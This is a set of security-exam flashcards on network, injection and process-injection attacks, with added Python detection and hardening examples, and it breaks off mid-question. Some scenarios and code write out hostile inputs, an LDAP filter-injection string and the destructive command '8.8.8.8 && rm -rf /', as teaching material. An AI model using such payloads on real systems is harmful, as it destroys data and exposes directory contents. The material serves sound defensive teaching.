ARP Poisoning is a Man-in-the-Middle (On-Path) attack where the attacker manipulates the ARP table to redirect traffic through their device.
(A) Rogue Access Point Attack is a fake Wi-Fi network, but here the attacker manipulated ARP tables.
(C) DNS Spoofing alters domain resolution, but here the attacker redirected network traffic.
(D) DoS attacks disrupt service, but do not involve intercepting traffic.
How can the company prevent this attack?
A) Use static ARP entries to prevent ARP spoofing
B) Disable HTTPS on internal applications
C) Allow unencrypted traffic for easy monitoring
D) Lower firewall restrictions
✅ Correct Answer: A) Use static ARP entries to prevent ARP spoofing
Explanation:
Static ARP entries prevent ARP spoofing because the host ignores ARP replies that contradict a pinned mapping. This does not scale beyond a few critical mappings (such as the gateway), so on managed switches the usual control is Dynamic ARP Inspection, which drops ARP packets that contradict the DHCP snooping table. Note also that the credentials were exposed because they travelled over plain HTTP; enforcing TLS on internal applications limits what an on-path attacker learns even when ARP is poisoned.
(B) Disabling HTTPS makes attacks easier, not harder.
(C) Allowing unencrypted traffic exposes sensitive data.
(D) Lowering firewall restrictions increases security risks.
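An added example, not taken from these flashcards, of how a monitoring host would spot the ARP poisoning described above. The detector walks ARP replies and alerts when an IP address changes MAC (high severity for the gateway) or when one MAC claims several IPs, which is what the attacker has to do to sit between the employee and the gateway. The gateway address, the interface name and the ARP replies are constructed for the demonstration.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumed default gateway for the segment

# Constructed ARP replies as (seconds, sender IP, sender MAC); not a real capture.
# The attacker's MAC (de:ad:be:ef:00:01) first claims the gateway's address, then
# the victim's, which is what puts it on-path in both directions.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),
    (1.0, "192.168.1.10", "00:11:22:33:44:10"),
    (2.0, "192.168.1.1", "de:ad:be:ef:00:01"),
    (2.5, "192.168.1.10", "de:ad:be:ef:00:01"),
]


def detect_arp_spoofing(replies, gateway_ip=GATEWAY_IP):
    """Walk ARP replies in order and raise an alert when an IP's MAC changes
    (high severity for the gateway) or one MAC claims more than one IP.
    Returns a list of (time, severity, message)."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            severity = "high" if ip == gateway_ip else "medium"
            alerts.append((ts, severity, f"{ip} moved from {previous} to {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append((ts, "high", f"{mac} claims {sorted(mac_to_ips[mac])}"))
    return alerts


def static_arp_commands(trusted, interface="eth0"):
    """Linux iproute2 commands that pin the trusted mappings, the mitigation
    chosen in the answer above. The interface name is an assumption."""
    return [f"ip neigh replace {ip} lladdr {mac} dev {interface} nud permanent"
            for ip, mac in trusted.items()]


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(alert)
    print(static_arp_commands({GATEWAY_IP: "00:11:22:33:44:01"}))
```

Routers that legitimately answer for several addresses (VRRP virtual IPs, for example) will trigger the one-MAC-many-IPs rule, so in practice that check is fed an allowlist of known multi-homed MACs.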
Scenario:
A company uses a wireless authentication system that requires users to enter a one-time passcode to log in. A hacker captures an authentication request and replays the request later to gain unauthorized access.
What type of attack is this?
A) Relay Attack
B) Replay Attack
C) Downgrade Attack
D) SSL Stripping
✅ Correct Answer: B) Replay Attack
Explanation:
A replay attack involves capturing valid authentication data and reusing it later.
(A) Relay Attack involves the attacker actively modifying communication in real-time.
(C) Downgrade Attack forces a lower security level, but does not reuse authentication packets.
(D) SSL Stripping removes HTTPS encryption but is not a replay attack.
How can the company prevent replay attacks?
A) Implement session tokens with expiration
B) Use predictable authentication keys
C) Store login credentials in plaintext
D) Allow unrestricted session reuse
✅ Correct Answer: A) Implement session tokens with expiration
Explanation:
Short-lived, single-use tokens mean a captured request is rejected when it is presented again; at the protocol level the same effect comes from binding a nonce or timestamp into the authenticated message so the server can recognise a repeat. In this scenario the replay worked because the server did not consume the one-time passcode after its first use, which a correct OTP implementation must do.
(B) Predictable authentication keys make attacks easier.
(C) Storing credentials in plaintext increases security risks.
(D) Allowing session reuse enables attackers to replay old sessions.
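As an added example (not part of these flashcards), the exchange below shows both sides of a replay-resistant authentication message in Python: the client binds a timestamp and a fresh nonce into an HMAC-authenticated request, and the server accepts each nonce once and only while the timestamp is fresh, so the captured request from the scenario is rejected when it is presented a second time. The pre-shared key, the 30-second freshness window and the message layout are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets
import time

SHARED_KEY = b"assumed-preshared-key-for-the-demo"  # assumption: both ends hold this


def make_auth_request(user, key=SHARED_KEY, now=None):
    """Client side: bind a timestamp and a fresh random nonce into the message and
    authenticate all three fields with an HMAC."""
    ts = int(time.time() if now is None else now)
    nonce = secrets.token_hex(16)
    tag = hmac.new(key, f"{user}|{ts}|{nonce}".encode(), hashlib.sha256).hexdigest()
    return {"user": user, "ts": ts, "nonce": nonce, "tag": tag}


class AuthServer:
    """Server side: a request is accepted once, only while its timestamp is fresh.
    The nonce cache only needs to cover the freshness window, which bounds its size."""

    def __init__(self, key=SHARED_KEY, window_seconds=30):
        self.key = key
        self.window = window_seconds
        self.seen = {}  # nonce -> timestamp it was accepted with

    def verify(self, request, now=None):
        now = time.time() if now is None else now
        message = f"{request['user']}|{request['ts']}|{request['nonce']}".encode()
        expected = hmac.new(self.key, message, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, request["tag"]):
            return "rejected: bad tag"          # forged or modified in transit
        if abs(now - request["ts"]) > self.window:
            return "rejected: stale timestamp"  # captured long ago
        # Forget nonces older than the window; they can no longer pass the check above.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if request["nonce"] in self.seen:
            return "rejected: replayed nonce"   # same capture presented again
        self.seen[request["nonce"]] = request["ts"]
        return "accepted"


if __name__ == "__main__":
    server = AuthServer()
    captured = make_auth_request("alice")
    print("first use  ->", server.verify(captured))
    print("replay     ->", server.verify(captured))
```

The timestamp alone is not enough (an attacker can replay within the window) and the nonce alone is not enough (the server would have to remember every nonce forever); combining them gives a bounded cache and no replay window.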
Scenario:
An attacker places themselves between a banking website and a customer. While the customer initiates a transaction, the attacker modifies the amount before relaying the request to the bank.
What type of attack is being used?
A) Replay Attack
B) SSL Stripping
C) Relay Attack
D) ARP Poisoning
✅ Correct Answer: C) Relay Attack
Explanation:
Relay Attacks involve intercepting and modifying real-time communication.
(A) Replay Attacks reuse valid authentication data later but do not modify it.
(B) SSL Stripping downgrades encrypted HTTPS to HTTP, but does not modify data.
(D) ARP Poisoning redirects traffic, but does not always modify transactions.
How can banks protect users from relay attacks?
A) Require multi-factor authentication (MFA) for transactions
B) Use weak encryption for faster performance
C) Store transaction details in plaintext for easier access
D) Allow unlimited session times
✅ Correct Answer: A) Require multi-factor authentication (MFA) for transactions
Explanation:
Requiring a second factor for the transaction itself, ideally an out-of-band confirmation that shows the amount and payee, means the attacker cannot get a modified transaction approved just by relaying the original request.
(B) Weak encryption makes attacks easier.
(C) Storing plaintext transaction details increases risk.
(D) Unlimited session times allow long-lived attacks.
Scenario:
A user logs into their email on public Wi-Fi. The attacker intercepts the initial unencrypted HTTP request and prevents the redirect to HTTPS, keeping the session unencrypted.
What attack is being used?
A) SSL Stripping
B) Downgrade Attack
C) DNS Spoofing
D) Relay Attack
✅ Correct Answer: A) SSL Stripping
Explanation:
SSL Stripping downgrades an HTTPS request to HTTP, allowing the attacker to intercept unencrypted data.
(B) Downgrade Attack forces weaker encryption but does not strip HTTPS entirely.
(C) DNS Spoofing redirects users to a fake website, rather than keeping them on HTTP.
(D) Relay Attack modifies data, but does not downgrade encryption.
How can websites prevent SSL stripping?
A) Use HSTS (HTTP Strict Transport Security)
B) Allow unencrypted login requests
C) Disable HTTPS for compatibility
D) Redirect HTTP requests to HTTP instead of HTTPS
✅ Correct Answer: A) Use HSTS (HTTP Strict Transport Security)
Explanation:
HSTS tells the browser to rewrite every http:// request for the site to https:// before it leaves the machine, so there is no plaintext first request for the attacker to intercept. The policy only takes effect after the browser has received the header over HTTPS once (or the site is on the browser preload list), so the very first visit remains exposed unless the site is preloaded.
(B) Unencrypted login requests expose credentials.
(C) Disabling HTTPS removes encryption entirely.
(D) Redirecting HTTP to HTTP keeps users on an insecure connection.
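An added example, not from these flashcards, modelling the two halves of the control in Python: the Strict-Transport-Security header as a site would send it, weak and strong forms side by side with a checker for the directives, and a simplified version of the browser-side check that rewrites http:// to https:// before any request goes out. Policy expiry and the real preload list are left out, and the host names are made up.

```python
# Weak: a zero max-age tells browsers to forget the policy, so every later visit
# starts over HTTP and can be stripped again.
WEAK_HSTS = "max-age=0"
# Recommended: one year, cover subdomains, and opt in to the browser preload list.
STRONG_HSTS = "max-age=31536000; includeSubDomains; preload"


def parse_hsts(header):
    """Split a Strict-Transport-Security value into a directive dict. Valueless
    directives (includeSubDomains, preload) map to True."""
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"') if value else True
    return directives


def hsts_is_strong(header, min_age=31536000, require_subdomains=True):
    """Audit check: max-age present, numeric and at least a year, and subdomains
    covered so an attacker cannot strip a sibling host instead."""
    d = parse_hsts(header)
    age = d.get("max-age")
    if not isinstance(age, str) or not age.isdigit() or int(age) < min_age:
        return False
    return d.get("includesubdomains") is True or not require_subdomains


def browser_upgrade(url_host, url_scheme, hsts_store):
    """Model of the browser's HSTS decision: an http:// URL is rewritten to https://
    if the host, or a parent domain whose policy carries includeSubDomains, has a
    cached policy. hsts_store maps host -> parsed directives (expiry ignored here)."""
    if url_scheme == "https":
        return "https"
    labels = url_host.lower().split(".")
    for i in range(len(labels)):
        domain = ".".join(labels[i:])
        policy = hsts_store.get(domain)
        if policy and (i == 0 or policy.get("includesubdomains") is True):
            return "https"
    return "http"


if __name__ == "__main__":
    store = {"mail.example.com": parse_hsts(STRONG_HSTS)}
    print(browser_upgrade("mail.example.com", "http", store))   # https
    print(browser_upgrade("mail.example.com", "http", {}))      # http: first visit, no policy yet
```

The last line in the usage block is the caveat from the explanation: with no cached policy the browser still sends the plaintext request, which is why sites that matter submit themselves to the preload list.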
Scenario:
A company uses TLS 1.3 encryption for their VPN connections. A hacker forces the client to negotiate a lower encryption protocol (SSL 2.0), allowing them to decrypt VPN traffic.
What type of attack is this?
A) ARP Poisoning
B) Downgrade Attack
C) Session Hijacking
D) Rogue Access Point
✅ Correct Answer: B) Downgrade Attack
Explanation:
A downgrade attack forces the endpoints to negotiate a weaker protocol version or cipher suite than they both support, so that known weaknesses in the older version can then be exploited. It only succeeds if both sides still accept the weak option; a TLS 1.3 peer also marks any negotiated downgrade in the ServerHello random so a TLS 1.3 client can detect the tampering.
(A) ARP Poisoning redirects traffic but does not weaken encryption.
(C) Session Hijacking steals session tokens, but does not modify encryption.
(D) Rogue Access Points intercept traffic without forcing encryption downgrades.
How can organizations prevent downgrade attacks?
A) Disable SSL 2.0, SSL 3.0, and TLS 1.0/1.1
B) Use weak encryption for older devices
C) Allow users to manually select encryption strength
D) Use passwords instead of encryption
✅ Correct Answer: A) Disable SSL 2.0, SSL 3.0, and TLS 1.0/1.1
Explanation:
Disabling outdated protocol versions on both client and server removes the weak option the attacker wants to negotiate; with nothing below TLS 1.2 enabled, the handshake fails rather than downgrading.
(B) Weak encryption increases vulnerability.
(C) Allowing manual encryption selection can be risky.
(D) Passwords alone do not protect against encryption attacks.
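The configuration side of the answer above, as an added Python example that is not part of these flashcards: a client TLS context that still accepts TLS 1.0 and 1.1 next to one with its floor at TLS 1.2, plus a small audit routine of the kind a reviewer would run over a code base. It uses only the standard ssl module; SSL 2.0 and 3.0 cannot be enabled at all because current OpenSSL builds no longer include them.

```python
import ssl


def legacy_client_context():
    """Weak configuration: floor at TLS 1.0 and certificate checks switched off,
    both still common in old integration code. A downgrade attacker only needs
    the weakest version both ends still accept."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context():
    """Hardened: certificate and hostname verification on, nothing below TLS 1.2.
    TLS 1.3 peers additionally mark a forced downgrade in ServerHello.random."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def accepted_versions(ctx):
    """Protocol versions the context is willing to negotiate, from its floor up."""
    ordered = [ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1,
               ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3]
    return [v.name for v in ordered if v >= ctx.minimum_version]


def audit_context(ctx):
    """Findings a reviewer would raise about a client context."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("accepts TLS below 1.2 (downgrade target)")
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("does not require a valid server certificate")
    if not ctx.check_hostname:
        findings.append("does not check the certificate hostname")
    return findings


if __name__ == "__main__":
    print("legacy  :", accepted_versions(legacy_client_context()), audit_context(legacy_client_context()))
    print("hardened:", accepted_versions(hardened_client_context()), audit_context(hardened_client_context()))
```

The same floor has to be set on the server (minimum_version on its context, or the equivalent ssl_protocols / SSLProtocol directive on a reverse proxy); a strict client talking to a permissive server still leaves other clients downgradeable.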
Scenario:
A company’s internal employee directory website allows users to search for employees by entering their name. The website uses LDAP queries to retrieve the employee’s details.
An attacker enters:
)(uid=))(|(uid=*
After submitting this, the attacker sees a list of all users in the company.
What vulnerability has been exploited?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) LDAP Injection
D) Buffer Overflow
✅ Correct Answer: C) LDAP Injection
Explanation:
The input closes the intended (uid=...) assertion and appends a wildcard match, (|(uid=*, so the lookup for one name becomes a filter that matches every entry in the directory.
(A) SQL Injection affects databases but not LDAP directories.
(B) XSS injects scripts into web pages, but does not exploit LDAP queries.
(D) Buffer Overflow is an attack on memory, not directory services.
How can this company prevent LDAP Injection?
A) Use input validation and sanitization
B) Allow unrestricted wildcard queries
C) Disable LDAP authentication
D) Store LDAP logs in plaintext
✅ Correct Answer: A) Use input validation and sanitization
Explanation:
Escaping the LDAP filter metacharacters ( ) * \ and NUL as RFC 4515 requires, or rejecting input that contains them, keeps the user's text as a literal value rather than filter syntax; an allowlist of permitted characters for a name field is simpler still.
(B) Allowing wildcard queries makes LDAP Injection easier.
(C) Disabling LDAP authentication removes useful functionality.
(D) Storing logs in plaintext does not prevent injection attacks.
Scenario:
A network monitoring tool allows users to ping a remote server by entering an IP address. A user enters:
8.8.8.8 && rm -rf /
After submitting, the system stops working and all files are deleted.
What vulnerability has been exploited?
A) SQL Injection
B) Cross-Site Request Forgery (CSRF)
C) Command Injection
D) Path Traversal
✅ Correct Answer: C) Command Injection
Explanation:
The input was concatenated into a command line that was handed to a shell, which treated && as a command separator and ran rm -rf / after ping.
(A) SQL Injection affects databases, not system commands.
(B) CSRF tricks users into making unintended requests, but does not inject commands.
(D) Path Traversal allows access to restricted files, but does not execute commands.
How can this application prevent Command Injection?
A) Only allow valid IP addresses or domain names
B) Execute all commands as an administrator
C) Store user commands in plaintext logs
D) Allow user input to execute without sanitization
✅ Correct Answer: A) Only allow valid IP addresses or domain names
Explanation:
Validating the input against an allowlist (IP address or hostname syntax) rejects anything containing shell metacharacters. Just as important, invoke ping with an argument vector rather than through a shell, so the target is always a single argument, and run the tool under a low-privilege account so a bypass cannot delete the system.
(B) Running commands as an administrator increases damage potential.
(C) Storing logs in plaintext does not prevent command execution.
(D) Allowing unchecked input is what caused the vulnerability.
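An added Python example, not taken from these flashcards, placing the flawed construction beside the hardened one: the vulnerable tool builds a command string for a shell, while the fixed version validates the target as an IP address or RFC 1123 hostname and then calls ping with an argument vector so no shell ever parses the input. The hostname pattern and the unprivileged service account are assumptions.

```python
import ipaddress
import re
import subprocess

# Hostname per RFC 1123 label rules: letters, digits and hyphens, no leading or
# trailing hyphen, labels of at most 63 characters, 253 overall. Nothing else.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)


def is_valid_target(target):
    """Allowlist check: the target must parse as an IP address or a hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def vulnerable_command_line(target):
    """What the flawed tool does: interpolate raw input into a string that is then
    handed to a shell (os.system or subprocess with shell=True). The shell sees
    '&&' as a separator, so for '8.8.8.8 && rm -rf /' it runs rm after ping."""
    return f"ping -c 1 {target}"


def build_ping_argv(target):
    """Hardened: validate first, then build an argument vector. With no shell in
    the path, the target is always exactly one argument to ping, whatever it
    contains; the allowlist above also keeps leading '-' out so it cannot be
    mistaken for an option."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


def run_ping(target, timeout=10):
    """Execute ping without a shell. Assumed to run as an unprivileged service
    account so even a validation bypass cannot touch the system."""
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True,
                          timeout=timeout)


if __name__ == "__main__":
    payload = "8.8.8.8 && rm -rf /"
    print("shell would run:", vulnerable_command_line(payload))
    try:
        build_ping_argv(payload)
    except ValueError as err:
        print("hardened tool:", err)
```
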
Scenario:
A malware researcher analyzes a user’s computer and notices that Notepad.exe (a normal application) is secretly making network connections to a suspicious server.
The researcher dumps the memory of Notepad.exe and finds malicious code inside.
What type of attack has occurred?
A) Rootkit Attack
B) Process Injection
C) SQL Injection
D) DNS Poisoning
✅ Correct Answer: B) Process Injection
Explanation:
Process Injection occurs when malicious code is injected into a legitimate process (Notepad.exe).
(A) Rootkits modify system files but do not inject into running processes.
(C) SQL Injection attacks databases, not processes.
(D) DNS Poisoning redirects traffic to malicious sites, but does not modify processes.
How can organizations prevent Process Injection?
A) Use Endpoint Detection & Response (EDR) solutions
B) Allow all applications to run with administrator privileges
C) Disable firewalls and antivirus for performance reasons
D) Ignore unusual behavior in system processes
✅ Correct Answer: A) Use Endpoint Detection & Response (EDR) solutions
Explanation:
EDR agents hook the calls injection relies on (cross-process memory writes, remote thread creation) and flag executable memory regions that do not map to any file on disk, then alert on or block the responsible process.
(B) Running everything as admin makes attacks worse.
(C) Disabling security features increases vulnerabilities.
(D) Ignoring unusual process behavior allows malware to persist.
Scenario:
An incident response team investigates a Windows server. They notice a process named svchost.exe (a legitimate Windows process) running, but when analyzed, its memory contains unexpected malicious code.
What type of process injection is this?
A) DLL Injection
B) Process Hollowing
C) Cross-Site Scripting (XSS)
D) Brute Force Attack
✅ Correct Answer: B) Process Hollowing
Explanation:
Process Hollowing starts a legitimate executable such as svchost.exe in a suspended state, unmaps its original image from memory, writes malicious code in its place and resumes the main thread, so the process name and path look normal while the code running is not.
(A) DLL Injection loads a malicious library into a running process alongside the legitimate code; it does not replace the process image.
(C) XSS injects JavaScript into websites, not system processes.
(D) Brute Force Attacks guess passwords, but do not modify processes.
How can organizations prevent Process Hollowing?
A) Use Kernel Security Modules
B) Allow unsigned processes to run freely
C) Disable memory monitoring tools
D) Grant all processes the same security privileges
✅ Correct Answer: A) Use Kernel Security Modules
Explanation:
Kernel-level protections (code-integrity enforcement, memory-integrity and EDR drivers) watch for an image being unmapped and replaced and for executable memory that does not correspond to the file on disk. Responders confirm hollowing by comparing the in-memory image with the executable on disk and by checking for a mismatched parent process, since a real svchost.exe is started by services.exe.
(B) Allowing unsigned processes increases risk.
(C) Disabling memory monitoring makes detection harder.
(D) Giving all processes the same privileges makes attacks easier.
Scenario:
A company’s HR system stores employee records in an LDAP directory. A security audit finds that an attacker can retrieve all users by modifying login input, but no database manipulation occurs.
What type of attack is this?
A) SQL Injection
B) LDAP Injection
C) Cross-Site Scripting (XSS)
D) Denial of Service (DoS)
✅ Correct Answer: B) LDAP Injection
Explanation:
LDAP Injection manipulates LDAP queries to extract sensitive directory data.
(A) SQL Injection affects relational databases, not directory services.
(C) XSS injects malicious JavaScript, but does not manipulate directory queries.
(D) DoS attacks overload a system, but do not extract user data.
How can organizations prevent LDAP Injection?
A) Use parameterized queries and input validation
B) Allow wildcard search queries
C) Disable user authentication
D) Log all login attempts in plaintext
✅ Correct Answer: A) Use parameterized queries and input validation
Explanation:
LDAP has no bind-parameter mechanism like SQL's prepared statements; "parameterized" here means building the filter with a library routine that escapes the user-supplied value so it can only ever be a literal, combined with validation of what a name may contain.
(B) Allowing wildcard searches makes LDAP Injection easier.
(C) Disabling authentication removes security.
(D) Logging logins does not prevent injection attacks.
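An added Python example, not part of these flashcards, covering both LDAP Injection scenarios above (the employee directory search and the HR login). It shows the vulnerable filter construction beside the escaped one using the RFC 4515 rules, runs the exact payload from the directory scenario through both, and adds a structural check that the finished filter is still a single equality assertion. Field names are assumptions; the ldap3 library ships an equivalent escape routine (ldap3.utils.conv.escape_filter_chars) for real code.

```python
import re

# RFC 4515 section 3: these characters must be written as \XX inside an
# assertion value so the directory matches them literally.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_filter(value):
    """Escape filter metacharacters in a user-supplied assertion value."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def user_filter_unsafe(name):
    """Vulnerable: raw input spliced straight into the filter string."""
    return f"(uid={name})"


def user_filter_safe(name):
    """Hardened: the value is escaped, so whatever the user typed stays inside
    one assertion and cannot open new filter components."""
    return f"(uid={escape_ldap_filter(name)})"


# Defence in depth: before sending, confirm the filter is exactly one equality
# assertion on uid whose value contains only literal characters or \XX escapes.
_SINGLE_ASSERTION = re.compile(r"^\(uid=(?:[^()*\\]|\\[0-9a-fA-F]{2})+\)$")


def is_single_assertion(filter_str):
    return _SINGLE_ASSERTION.match(filter_str) is not None


PAYLOAD = ")(uid=))(|(uid=*"  # the input from the directory scenario above


if __name__ == "__main__":
    print("unsafe :", user_filter_unsafe(PAYLOAD), is_single_assertion(user_filter_unsafe(PAYLOAD)))
    print("safe   :", user_filter_safe(PAYLOAD), is_single_assertion(user_filter_safe(PAYLOAD)))
```

The escaped filter searches for a uid that literally contains parentheses and an asterisk, which matches nobody; the structural check would also reject the unsafe filter before it reached the directory, which is the layer that saves you when an escaping call is forgotten.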
Scenario:
A company’s Active Directory logs show that a single user account has been locked out 15 times in one hour. The failed login attempts are coming from different IP addresses.
What is the most likely cause of this behavior?
A) User forgot their password
B) A brute-force attack is in progress
C) The company’s password policy is too strict
D) A system error is preventing logins
✅ Correct Answer: B) A brute-force attack is in progress
Explanation:
Multiple failed login attempts from different IP addresses indicate an automated attack.
(A) A user forgetting their password is unlikely to lock the account that many times in one hour.
(C) A strict password policy may cause occasional lockouts but would not cause multiple IP addresses attempting logins.
(D) System errors are possible, but a brute-force attack is a more likely explanation.
How can this company prevent future brute-force attacks?
A) Implement account lockout policies after multiple failed login attempts
B) Require multi-factor authentication (MFA) for login
C) Use CAPTCHAs to prevent automated login attempts
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) Account lockout policies slow down brute-force attacks, though an attacker can abuse them to lock legitimate users out, so pair them with the other two controls.
(B) MFA prevents unauthorized access even if a password is guessed.
(C) CAPTCHAs and rate limiting block automated bots from trying many passwords.
Scenario:
An employee logs into the company’s VPN from their home in California at 9:00 AM. At 9:05 AM, another session for the same user account is detected from an IP address in Russia.
What is the most likely explanation?
A) The employee is using a VPN service
B) The employee is traveling between locations
C) The employee’s credentials have been compromised
D) The user is working from multiple devices
✅ Correct Answer: C) The employee’s credentials have been compromised
Explanation:
It is impossible to travel from California to Russia in 5 minutes. This suggests an attacker is using stolen credentials.
(A) VPN services can make login locations appear different, but this scenario lacks evidence of VPN use.
(B) Travel is physically impossible in this timeframe.
(D) Multiple devices wouldn’t explain the geographically distant logins.
What action should be taken?
A) Disable the employee’s account immediately
B) Investigate logs to confirm unusual activity before taking action
C) Ignore it, as false positives are common
D) Change the password and notify the user
✅ Correct Answer: B) Investigate logs to confirm unusual activity before taking action
Explanation:
Immediate disablement (A) could disrupt legitimate users.
Checking logs (B) is best practice to confirm a real attack.
(C) Ignoring the alert is risky.
(D) Changing the password is good, but investigation should come first.
Scenario:
A security analyst notices that a user logged in from Brazil at 2:00 AM, and then logged in from Germany at 2:15 AM.
Which IoC does this best represent?
A) Account Lockout
B) Resource Consumption
C) Impossible Travel
D) Command Injection
✅ Correct Answer: C) Impossible Travel
Explanation:
It is physically impossible to travel from Brazil to Germany in 15 minutes.
(A) Account Lockouts involve multiple failed logins.
(B) Resource Consumption relates to high CPU/memory usage.
(D) Command Injection involves executing unauthorized system commands.
How can security teams respond to Impossible Travel incidents?
A) Verify if the user is using a VPN
B) Force the user to reset their password
C) Monitor future logins from unexpected locations
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) Some VPN services can make logins appear from distant locations.
(B) Resetting the password prevents attackers from using stolen credentials.
(C) Future logins should be monitored for signs of further compromise.
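An added Python example, not part of these flashcards, that runs the two indicators from the preceding scenarios over a constructed batch of authentication events: repeated failures against one account from several source addresses inside an hour (the lockout scenario) and successive logins too far apart to be the same person (both impossible travel scenarios). The events, coordinates, thresholds and the 1,000 km/h speed limit are assumptions; in a real pipeline the coordinates come from a geo-IP lookup done before this step.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

# Any apparent speed above this is treated as impossible travel. Deliberately
# generous (faster than any airliner) to absorb geo-IP imprecision. Assumption.
MAX_SPEED_KMH = 1000

T0 = datetime(2024, 5, 6, 8, 0)  # constructed base time

# Constructed authentication events (not real logs). Documentation IP ranges only.
SAMPLE_EVENTS = (
    # 15 failures against jdoe inside an hour, rotating across three source IPs
    [{"time": T0 + timedelta(minutes=4 * i), "user": "jdoe",
      "ip": f"203.0.113.{10 + i % 3}", "result": "failure", "lat": 0.0, "lon": 0.0}
     for i in range(15)]
    # asmith: San Francisco at 09:00, then Moscow five minutes later
    + [{"time": T0 + timedelta(hours=1), "user": "asmith", "ip": "198.51.100.7",
        "result": "success", "lat": 37.77, "lon": -122.42},
       {"time": T0 + timedelta(hours=1, minutes=5), "user": "asmith", "ip": "192.0.2.99",
        "result": "success", "lat": 55.75, "lon": 37.62}]
    # bwong: Berlin, then Frankfurt two hours later (plausible by train)
    + [{"time": T0, "user": "bwong", "ip": "198.51.100.20",
        "result": "success", "lat": 52.52, "lon": 13.40},
       {"time": T0 + timedelta(hours=2), "user": "bwong", "ip": "198.51.100.21",
        "result": "success", "lat": 50.11, "lon": 8.68}]
)


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def brute_force_candidates(events, window=timedelta(hours=1), min_failures=10, min_ips=2):
    """Flag accounts with many failures from several source IPs inside one sliding
    window. One alert per account."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "failure":
            failures[e["user"]].append(e)
    alerts = []
    for user, fails in failures.items():
        fails.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(fails)):
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            ips = {e["ip"] for e in fails[start:end + 1]}
            if end - start + 1 >= min_failures and len(ips) >= min_ips:
                alerts.append({"user": user, "failures": end - start + 1,
                               "distinct_ips": len(ips)})
                break
    return alerts


def impossible_travel(events, max_speed_kmh=MAX_SPEED_KMH):
    """Flag consecutive successful logins for a user that imply travel faster
    than max_speed_kmh. Same-minute logins from different places count."""
    alerts = []
    last = {}
    successes = sorted((e for e in events if e["result"] == "success"), key=lambda e: e["time"])
    for e in successes:
        prev = last.get(e["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            hours = (e["time"] - prev["time"]).total_seconds() / 3600
            speed = km / hours if hours > 0 else (float("inf") if km > 0 else 0.0)
            if speed > max_speed_kmh:
                alerts.append({"user": e["user"], "from_ip": prev["ip"], "to_ip": e["ip"],
                               "km": round(km), "minutes": round(hours * 60)})
        last[e["user"]] = e
    return alerts


if __name__ == "__main__":
    print(brute_force_candidates(SAMPLE_EVENTS))
    print(impossible_travel(SAMPLE_EVENTS))
```

Both checks produce candidates, not verdicts: the impossible travel alert still needs the VPN check from the answer above (corporate VPN egress points are the usual false positive), and the brute-force alert is what justifies the MFA and rate-limiting controls rather than an immediate account disable.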
Scenario:
A company’s web server CPU usage suddenly spikes from 10% to 95% for several hours, slowing down access to the website.
What is the most likely explanation?
A) A hacker is running a crypto-mining operation on the server
B) The server is under a Distributed Denial of Service (DDoS) attack
C) A system update caused temporary CPU usage increase
D) Both A and B
✅ Correct Answer: D) Both A and B
Explanation:
Sudden CPU spikes can indicate DDoS attacks (B) or malware mining cryptocurrency (A).
(C) System updates cause temporary spikes but not prolonged high CPU use.
How can companies defend against these threats?
A) Use Intrusion Detection Systems (IDS) to detect unusual activity
B) Monitor CPU and network usage for anomalies
C) Implement firewalls and rate limiting to block DDoS attacks
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) IDS tools help detect unauthorized activity.
(B) Monitoring CPU usage helps detect crypto-mining malware.
(C) Firewalls block suspicious traffic during a DDoS attack.
Scenario:
A security team investigates a suspected breach. They find that the log files for a critical database server are missing for a 4-hour period.
What is the most likely cause?
A) The logs were automatically deleted due to system settings
